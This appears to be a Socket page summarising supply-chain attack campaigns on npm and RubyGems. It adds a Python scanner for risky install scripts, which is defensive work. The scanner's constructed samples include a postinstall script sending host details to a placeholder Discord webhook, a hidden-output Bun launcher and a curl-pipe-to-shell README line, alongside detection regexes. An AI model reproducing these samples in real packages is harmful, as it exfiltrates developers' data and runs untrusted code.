JAVASCRIPT: npm (Node Package Manager)

.NET: NuGet (.NET Package Manager)

PYTHON: PyPI (Python Package Index)

RUBY: RubyGems.org (Ruby Package Manager)

AI: Hugging Face Hub (AI Model Hub)

CI: GitHub Actions (CI/CD Workflows)

EXTENSIONS: Chrome Web Store (Chrome Browser Extensions)

EXTENSIONS: Open VSX (VS Code Extensions)

Supply chain attacks are on the rise

Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Nov 23, 2025

Shai Hulud v2

Shai Hulud v2 campaign: preinstall script (setup_bun.js) and loader (setup_bin.js) that installs/locates Bun and executes an obfuscated bundled malicious script (bun_environment.js) with suppressed output.

Nov 05, 2025

Elves on npm

A surge of auto-generated "elf-stats" npm packages is being published from new accounts at a rate of roughly one every two minutes. These packages contain simple malware variants and are being rapidly removed by npm. At least 420 unique packages have been identified, some of which mention a capture-the-flag challenge or test.

Jul 04, 2025

RubyGems Automation-Tool Infostealer

Since at least March 2023, a threat actor using multiple aliases uploaded 60 malicious gems to RubyGems that masquerade as automation tools (Instagram, TikTok, Twitter, Telegram, WordPress, and Naver). The gems display a Korean Glimmer-DSL-LibUI login window, then exfiltrate the entered username/password and the host's MAC address via HTTP POST to threat actor-controlled infrastructure.

Mar 13, 2025

North Korea's Contagious Interview Campaign

Since late 2024, we have tracked hundreds of malicious npm packages and supporting infrastructure tied to North Korea's Contagious Interview operation, with tens of thousands of downloads targeting developers and tech job seekers. The threat actors run a factory-style playbook: recruiter lures and fake coding tests, polished GitHub templates, and typosquatted or deceptive dependencies that install or import into real projects.

Jul 23, 2024

Network Reconnaissance Campaign

A malicious npm supply chain campaign used 60 packages across three disposable npm accounts to fingerprint developer workstations and CI/CD servers during installation. Each package embedded a compact postinstall script that collected hostnames, internal and external IP addresses, DNS resolvers, usernames, home and working directories, and package metadata, then exfiltrated this data as a JSON blob to a hardcoded Discord webhook.
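The Shai Hulud v2 and Network Reconnaissance entries above share a shape: an install lifecycle script that runs bundled code, which then spawns a runtime with suppressed output or fingerprints the host and posts the result to a webhook. The Skill Scanner result earlier on this page adds a third install-time pattern, a pipe-to-shell quick start in the documentation. The following added example (not Socket's scanner, and the indicator list is an assumption about what to look for) checks a package's manifest, scripts and docs for those patterns. The sample packages are constructed to mimic the reported shapes and are not the real packages' code.

```python
"""Install-time risk scanner for an npm-style package: flags lifecycle scripts,
host fingerprinting, webhook exfiltration, suppressed child-process output,
dynamic eval, and pipe-to-shell instructions in docs. Added example with
constructed samples; the patterns are assumptions, not Socket's detection rules."""
import json
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "preprepare", "postprepare")

# (finding name, regex) applied to every file in the package other than the manifest.
INDICATORS = [
    ("exfil-webhook", re.compile(r"discord(?:app)?\.com/api/webhooks/", re.I)),
    ("host-fingerprint", re.compile(r"\bos\.(?:hostname|networkInterfaces|userInfo|homedir)\s*\(")),
    ("suppressed-output", re.compile(r"stdio\s*:\s*['\"]ignore['\"]")),
    ("spawns-runtime", re.compile(
        r"\b(?:spawn|spawnSync|exec|execSync|execFile|execFileSync)\(\s*['\"](?:bun|node|sh|bash|powershell)['\"]")),
    ("dynamic-eval", re.compile(r"\beval\s*\(|new\s+Function\s*\(")),
    ("pipe-to-shell", re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")),
]


def scan_package(files):
    """files: {path: text}, must include 'package.json'. Returns sorted (path, finding) pairs.
    Lifecycle hooks are reported from the manifest; every other file is matched
    against INDICATORS."""
    findings = set()
    manifest = json.loads(files["package.json"])
    scripts = manifest.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        if hook in scripts:
            findings.add(("package.json", f"install-script:{hook}"))
    for path, text in files.items():
        if path == "package.json":
            continue
        for name, pattern in INDICATORS:
            if pattern.search(text):
                findings.add((path, name))
    return sorted(findings)


# Constructed samples modelled on the reported shapes; not the real packages' code.
SHAI_HULUD_STYLE = {
    "package.json": json.dumps({"name": "demo-pkg", "version": "1.0.0",
                                "scripts": {"preinstall": "node setup_bun.js"}}),
    "setup_bun.js": (
        "const { spawnSync } = require('child_process');\n"
        "// locate or install bun, then run the bundled script with output hidden\n"
        "spawnSync('bun', ['bun_environment.js'], { stdio: 'ignore' });\n"
    ),
}

RECON_STYLE = {
    "package.json": json.dumps({"name": "demo-pkg2", "version": "0.0.1",
                                "scripts": {"postinstall": "node collect.js"}}),
    "collect.js": (
        "const os = require('os');\n"
        "const data = { host: os.hostname(), nets: os.networkInterfaces(), user: os.userInfo().username };\n"
        "fetch('https://discord.com/api/webhooks/000/constructed', { method: 'POST', body: JSON.stringify(data) });\n"
    ),
}

BENIGN = {
    "package.json": json.dumps({"name": "tidy-lib", "version": "2.1.0", "scripts": {"test": "node test.js"}}),
    "index.js": "module.exports = (a, b) => a + b;\n",
    "README.md": "Install with `npm install tidy-lib`.\n",
}

PIPE_TO_SHELL_DOC = {
    "package.json": json.dumps({"name": "viz-skill", "version": "1.0.0"}),
    "README.md": "Quick start: curl -fsSL https://example.invalid/install.sh | sh\n",
}


if __name__ == "__main__":
    for label, pkg in [("shai-hulud-style", SHAI_HULUD_STYLE), ("recon-style", RECON_STYLE),
                       ("benign", BENIGN), ("pipe-to-shell-doc", PIPE_TO_SHELL_DOC)]:
        print(label, scan_package(pkg))
```

A lifecycle hook on its own is common in legitimate packages (native builds, husky hooks), so the useful signal is the combination: an install hook plus a file that fingerprints the host, hides its child's output, or names a webhook endpoint. Treat the regexes as triage, not a verdict; obfuscated loaders like the one described for Shai Hulud v2 defeat plain pattern matching and need the bundle unpacked first.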

Ready to dive in?

Get protected by Socket with just 2 clicks.


The latest from the Socket team

Get our latest security research, open source insights, and product updates.
